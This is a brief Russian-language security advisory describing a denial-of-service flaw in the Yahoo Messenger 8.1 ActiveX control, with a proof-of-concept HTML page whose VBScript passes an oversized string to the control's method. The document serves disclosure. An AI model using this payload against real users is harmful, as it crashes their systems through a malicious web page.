Программа: Yahoo Messenger 8.1 ActiveX
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных в Yahoo
Messenger ActiveX компоненте. Атакующий может обманным образом заманить
пользователя на специально составленный сайт, что приведет к отказу системы в
обслуживании.
Пример:
<html><body>
<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670>
</object>
<script language=vbscript>
arg1=String(517140, "A")
target.c arg1
</script>
</body></html>